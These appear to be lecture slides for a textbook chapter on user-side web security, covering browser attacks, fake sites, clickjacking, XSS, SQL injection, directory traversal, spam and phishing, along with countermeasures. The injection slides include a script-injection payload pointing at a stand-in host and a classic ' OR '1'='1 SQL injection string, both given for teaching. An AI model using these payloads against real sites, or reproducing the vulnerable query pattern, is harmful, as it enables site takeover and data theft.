Security in Computing,Fifth Edition

Chapter 4: The Web—User Side

Chapter 4 Objectives

Attacks against browsers

Fake and malicious websites

Attacks targeting sensitive data

Injection attacks

Spam

Phishing attacks

Internet Usage

1995 – <1%

2005 – 1 Billion or ~16%

2010 – 2 Billion or ~30%

2014 – 3 Billion or ~41%

2016 – 3.4 Billion or ~46%

Browser Vulnerabilities

As browsers have in many ways become our new operating systems, the increases in complexity and scrutiny can be seen in this chart of newly discovered browser vulnerabilities.

Browser Vulnerabilities

As browsers have in many ways become our new operating systems, the increases in complexity and scrutiny can be seen in this chart of newly discovered browser vulnerabilities.

Browser Popularity

Browser Vulnerabilities

Browser Attack Types

Man-in-the-browser

Keystroke logger

Page-in-the-middle

Program download substitution

User-in-the-middle

These types of browser attack are covered in more depth in the next few slides.

Man-in-the-Browser

Trojan that generally installed as a browser plug-in

SilentBanker was a Trojan that generally installed as a browser plug-in. When it detected the user going to a banking URL, it would intercept keystrokes and even modify them so that money transfers would go to attackers’ accounts.

Keystroke Logger

Hardware or software that records all keystrokes

May be a small dongle plugged into a USB port or can masquerade as a keyboard

May also be installed as malware

Not limited to browsers

Page-in-the-Middle

User is directed to a different page than believed or intended

Similar effect to a man-in-the-browser, where attacker can intercept and modify user input

Program Download Substitution

Attacker creates a page with seemingly innocuous and desirable programs for download

Instead of, or in addition to, the intended functionality, the user installs malware

This is a very common technique for spyware

User-in-the-Middle

Using click-bait to trick users into solving CAPTCHAs on spammers’ behalf

CAPTCHAs are used by websites to defeat automation, such as by preventing spammers from scripting the creation of massive numbers of email accounts. By using dummy websites to entice users into solving CAPTCHAs, attackers can effectively defeat the CAPTCHAs at scale.

Successful Authentication

The attacks listed above are largely failures of authentication

Can be mitigated with

Shared secret

One-time password

Out-of-band communication

Common examples of these mechanisms are SecurID tokens, Google Authenticator, and text message codes. Driver signing is an example of using such techniques to mitigate local malware.

Fake Website

Example of a fake banking website meant to trick users.

Fake Code

Example of a software download site meant to trick users into downloading malicious applications.

Tracking Bug

A tiny image served up from one provider (“ClicksRUs”) that tracks user behavior for advertising purposes.

Students probably notice this when they see web ads that offer up items very similar to ones they’ve recently been shopping for on other sites.

Web bugs can also be used to track users’ reading of advertising emails.

A tiny image served up from one provider (“ClicksRUs”) that allows user behavior to be tracked across many sites for advertising purposes. Students probably notice this when they see web ads that offer up items very similar to ones they’ve recently been shopping for on other sites. Web bugs can also be used to track users’ reading of advertising emails.

Clickjacking

Clickjacking is a way of tricking users into providing desired input. The attacker makes the input dialog transparent and places an image with an enticement below the transparent dialog. The user ends up answering a question he didn’t even know he was being asked, unknowingly authorizing his computer to execute the attacker’s will.

Drive-By Download

Code is downloaded, installed, and executed on a computer without the user’s knowledge

May be the result of clickjacking, fake code, program download substitution, etc.

Unwanted browser toolbars are an example that just about every student will have had experience with.

Cross-Site Scripting (XSS)

Tricking a client or server into executing scripted code by including the code in data inputs

Scripts and HTML tags are encoded as plaintext just like user inputs, so they can take over web pages similarly to the way buffer overflow attacks can take over programs

Cool<br>story.<br>KCTVBigFan<script src=http://badsite.com/xss.js></script>

Cross-Site Scripting (XSS)

Cross-Site Scripting (Reflected XSS)

SQL Injection

Injecting SQL code into an exchange between an application and its database server

Example:

Loading an SQL query into a variable, taking the value of acctNum from an arbitrary user input field:

QUERY = "SELECT * FROM trans WHERE acct = '" + acctNum + " '; "

The same query with malicious user input:

QUERY = "SELECT * FROM trans WHERE acct = '2468' OR '1'='1'; "

The result of this example attack is that the application returns the entire accounts table from the database.

Dot-Dot-Slash

Also known as “directory traversal,” this is when attackers use the term “../” to access files that are on the target web server but not meant to be accessed from outside

Most commonly entered into the URL bar but may also be combined with other attacks, such as XSS

IE is Evil

Server-Side Include (SSI)

SSI is an interpreted server-side scripting language that can be used for basic web server directives, such as including files and executing commands

As is the case with XSS, some websites are vulnerable to allowing users to execute SSI directives through text input

Countermeasures to Injections

Filter and sanitize all user input

Need to account for every potentially valid encoding

Make no assumptions about the range of possible user inputs—trust nothing, check everything

Use access control mechanisms on backend servers, such as “stored procedures” – they separate SQL code from SQL data, thus preventing most SQL injection attacks.

Stored procedures effectively separate SQL code from SQL data, thus preventing most SQL injection attacks.

Email Spam

Experts estimate that 60% to 90% of all email is spam

Types of spam:

Advertising

Pharmaceuticals

Stocks

Malicious code

Links for malicious websites

Spam countermeasures

Laws against spam exist but are generally ineffective

Email filters have become very effective for most spam

Internet service providers use volume limitations to make spammers’ jobs more difficult

My email example (Knucklehead from SC)

14/33 accts

Phishing

A message that tries to trick a victim into providing private information or taking some other unsafe action

Spear phishing: A targeted attack that is personalized to a particular recipient or set of recipients

Email example 636 pic

Countermeasures

User education (Wombat/PhishMe)

Limited effectiveness and very subject to co-evolution with attacks

PGP and S/MIME

Cryptographic solutions (encryption & signatures) that have seen very limited adoption after years on the market

OTHERS (Good research area)

User education has become more scientific over the years, with products like PhishMe automating the user training process and focusing on the worst offenders. PGP and S/MIME are both solutions for encrypting and signing email.

Summary

What is the most secure web server?

What is second best?

Summary

Activities:

Server Maintenance

Web App Updates

Web site coding

Limit Information Transfer

Technologies:

Web scans (+ penetration testing)

Firewalls, Antrivirus, and IPS/IDS (Intrusion detection system)